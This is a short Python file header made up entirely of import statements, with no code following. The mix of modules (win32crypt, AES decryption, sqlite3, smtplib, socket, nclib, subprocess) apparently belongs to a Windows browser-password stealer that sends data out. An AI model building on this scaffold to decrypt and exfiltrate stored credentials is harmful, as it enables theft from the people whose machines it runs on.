from msilib.schema import File
import os
import smtplib
from email.message import EmailMessage
import sys
import re
import sys
import socket
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil
import csv
import nclib
import http.server
import socketserver
import subprocess
from subprocess import check_call